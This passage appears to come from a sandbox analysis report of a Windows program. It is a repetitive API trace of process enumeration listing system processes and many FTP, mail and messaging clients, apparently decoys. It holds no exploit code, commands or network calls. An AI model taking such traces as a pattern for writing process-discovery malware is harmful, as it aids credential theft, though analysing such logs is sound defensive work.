lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.296] GetCurrentProcessId () returned 0xde0 [0097.296] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.297] GetCurrentProcessId () returned 0xde0 [0097.297] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f8, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0097.298] GetCurrentProcessId () returned 0xde0 [0097.298] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.298] GetCurrentProcessId () returned 0xde0 [0097.299] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.299] GetCurrentProcessId () returned 0xde0 [0097.299] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.300] GetCurrentProcessId () returned 0xde0 [0097.300] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.301] GetCurrentProcessId () returned 0xde0 [0097.301] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.301] GetCurrentProcessId () returned 0xde0 [0097.301] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.302] GetCurrentProcessId () returned 0xde0 [0097.302] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x478, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.303] GetCurrentProcessId () returned 0xde0 [0097.303] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0097.303] GetCurrentProcessId () returned 0xde0 [0097.303] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0097.304] GetCurrentProcessId () returned 0xde0 [0097.304] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.305] GetCurrentProcessId () returned 0xde0 [0097.305] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0097.305] GetCurrentProcessId () returned 0xde0 [0097.305] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.306] GetCurrentProcessId () returned 0xde0 [0097.306] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.307] GetCurrentProcessId () returned 0xde0 [0097.307] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x7e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0097.307] GetCurrentProcessId () returned 0xde0 [0097.307] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0097.308] GetCurrentProcessId () returned 0xde0 [0097.308] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0097.308] GetCurrentProcessId () returned 0xde0 [0097.308] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0097.309] GetCurrentProcessId () returned 0xde0 [0097.309] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.310] GetCurrentProcessId () returned 0xde0 [0097.310] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0097.316] GetCurrentProcessId () returned 0xde0 [0097.316] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.316] GetCurrentProcessId () returned 0xde0 [0097.316] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0097.317] GetCurrentProcessId () returned 0xde0 [0097.317] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0097.317] GetCurrentProcessId () returned 0xde0 [0097.318] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.318] GetCurrentProcessId () returned 0xde0 [0097.318] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x66c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.319] GetCurrentProcessId () returned 0xde0 [0097.319] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="employee.exe")) returned 1 [0097.319] GetCurrentProcessId () returned 0xde0 [0097.319] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="structure_indeed.exe")) returned 1 [0097.320] GetCurrentProcessId () returned 0xde0 [0097.320] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="beatdeal.exe")) returned 1 [0097.320] GetCurrentProcessId () returned 0xde0 [0097.320] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="my-technology.exe")) returned 1 [0097.321] GetCurrentProcessId () returned 0xde0 [0097.321] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="away.exe")) returned 1 [0097.322] GetCurrentProcessId () returned 0xde0 [0097.322] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="education process memory.exe")) returned 1 [0097.322] GetCurrentProcessId () returned 0xde0 [0097.322] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="period.exe")) returned 1 [0097.323] GetCurrentProcessId () returned 0xde0 [0097.323] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="focus_wear.exe")) returned 1 [0097.323] GetCurrentProcessId () returned 0xde0 [0097.323] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious-wonder-win.exe")) returned 1 [0097.324] GetCurrentProcessId () returned 0xde0 [0097.324] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="addressseasonlow.exe")) returned 1 [0097.325] GetCurrentProcessId () returned 0xde0 [0097.325] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="newspapertrypositive.exe")) returned 1 [0097.325] GetCurrentProcessId () returned 0xde0 [0097.325] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xde8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="containhowever.exe")) returned 1 [0097.329] GetCurrentProcessId () returned 0xde0 [0097.329] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="amount-bad.exe")) returned 1 [0097.330] GetCurrentProcessId () returned 0xde0 [0097.330] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="various.exe")) returned 1 [0097.330] GetCurrentProcessId () returned 0xde0 [0097.330] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="military.exe")) returned 1 [0097.331] GetCurrentProcessId () returned 0xde0 [0097.331] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="coach_wait_small.exe")) returned 1 [0097.332] GetCurrentProcessId () returned 0xde0 [0097.332] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="pressure_former.exe")) returned 1 [0097.332] GetCurrentProcessId () returned 0xde0 [0097.332] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="project.exe")) returned 1 [0097.333] GetCurrentProcessId () returned 0xde0 [0097.333] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="body.exe")) returned 1 [0097.333] GetCurrentProcessId () returned 0xde0 [0097.333] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="though.exe")) returned 1 [0097.334] GetCurrentProcessId () returned 0xde0 [0097.334] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0097.335] GetCurrentProcessId () returned 0xde0 [0097.335] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0097.336] GetCurrentProcessId () returned 0xde0 [0097.336] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0097.336] GetCurrentProcessId () returned 0xde0 [0097.336] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0097.337] GetCurrentProcessId () returned 0xde0 [0097.337] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0097.338] GetCurrentProcessId () returned 0xde0 [0097.338] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0097.339] GetCurrentProcessId () returned 0xde0 [0097.339] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0097.340] GetCurrentProcessId () returned 0xde0 [0097.340] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xea8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0097.341] GetCurrentProcessId () returned 0xde0 [0097.341] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0097.342] GetCurrentProcessId () returned 0xde0 [0097.342] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xec8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0097.343] GetCurrentProcessId () returned 0xde0 [0097.343] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xed0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0097.344] GetCurrentProcessId () returned 0xde0 [0097.344] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0097.345] GetCurrentProcessId () returned 0xde0 [0097.345] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0097.346] GetCurrentProcessId () returned 0xde0 [0097.346] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0097.347] GetCurrentProcessId () returned 0xde0 [0097.347] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0097.348] GetCurrentProcessId () returned 0xde0 [0097.348] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0097.349] GetCurrentProcessId () returned 0xde0 [0097.349] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0097.349] GetCurrentProcessId () returned 0xde0 [0097.349] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0097.350] GetCurrentProcessId () returned 0xde0 [0097.350] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0097.351] GetCurrentProcessId () returned 0xde0 [0097.351] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0097.352] GetCurrentProcessId () returned 0xde0 [0097.352] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0097.353] GetCurrentProcessId () returned 0xde0 [0097.353] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0097.353] GetCurrentProcessId () returned 0xde0 [0097.353] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0097.354] GetCurrentProcessId () returned 0xde0 [0097.354] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0097.355] GetCurrentProcessId () returned 0xde0 [0097.355] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0097.356] GetCurrentProcessId () returned 0xde0 [0097.356] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0097.356] GetCurrentProcessId () returned 0xde0 [0097.356] Process32NextW (in: hSnapshot=0x1fc, lppe=0xce0b0 | out: lppe=0xce0b0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf90, 